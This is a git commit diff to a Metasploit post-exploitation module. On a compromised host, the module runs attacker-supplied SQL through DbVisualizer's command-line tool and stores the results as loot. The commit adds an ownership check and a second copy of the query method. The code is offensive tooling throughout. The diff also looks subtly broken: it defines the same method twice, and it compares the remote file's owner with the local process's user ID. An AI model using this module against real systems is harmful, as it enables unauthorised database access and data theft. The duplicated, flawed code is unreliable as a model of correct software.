Update dbvis_query.rb

2014-07-16 18:48:15 +02:00 · 2014-07-16 18:48:15 +02:00 · 200c122ecd
parent 31e38cee23
commit 200c122ecd
1 changed files with 48 additions and 16 deletions
--- a/modules/post/multi/manage/dbvis_query.rb
+++ b/modules/post/multi/manage/dbvis_query.rb
@ -177,27 +177,59 @@ class Metasploit3 < Msf::Post
    return dbvis
  end

+
  # Query execution method
  def dbvis_query(dbvis,sql)
    error =false
    resp=''
    if file?(dbvis)==true
-      print_status("Trying to execute evil sql, it can take time ...")
-      args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
-      dbvis ="\"#{dbvis}\""
-      cmd = "#{dbvis} #{args}"
-      resp = cmd_exec(cmd)
-      print_line("")
-      print_line("#{resp}")
-      # store qury and result
-      p = store_loot(
-        "dbvis.query",
-        "text/plain",
-        session,
-        resp.to_s,
-        "dbvis_query.txt",
-        "dbvis query")
-      print_good("Query stored in: #{p.to_s}")
+      f = session.fs.file.stat(dbvis)
+      if f.uid == Process.euid or Process.groups.include?f.gid
+        print_status("Trying to execute evil sql, it can take time ...")
+        args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
+        dbvis ="\"#{dbvis}\""
+        cmd = "#{dbvis} #{args}"
+        resp = cmd_exec(cmd)
+        vprint_line("")
+        vprint_status("#{resp}")
+        if resp =~ /denied|failed/i
+          error = true
+        end
+      else
+         print_error("User doesn't have enough rights to execute dbviscmd, aborting")
+      end
+    else
+      print_error("#{dbvis} is not a file")
+    end
+    return error
+  end
+
+  # Query execution method
+  def dbvis_query(dbvis,sql)
+    error =false
+    resp=''
+    if file?(dbvis)==true
+      f = session.fs.file.stat(dbvis)
+      if f.uid == Process.euid or Process.groups.include?f.gid
+        print_status("Trying to execute evil sql, it can take time ...")
+        args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\""
+        dbvis ="\"#{dbvis}\""
+        cmd = "#{dbvis} #{args}"
+        resp = cmd_exec(cmd)
+        print_line("")
+        print_line("#{resp}")
+        # store qury and result
+        p = store_loot(
+          "dbvis.query",
+          "text/plain",
+          session,
+          resp.to_s,
+          "dbvis_query.txt",
+          "dbvis query")
+        print_good("Query stored in: #{p.to_s}")
+      else
+        print_error("User doesn't have enough rights to execute dbviscmd, aborting")
+      end
    else
      print_error("#{dbvis} is not a file")
    end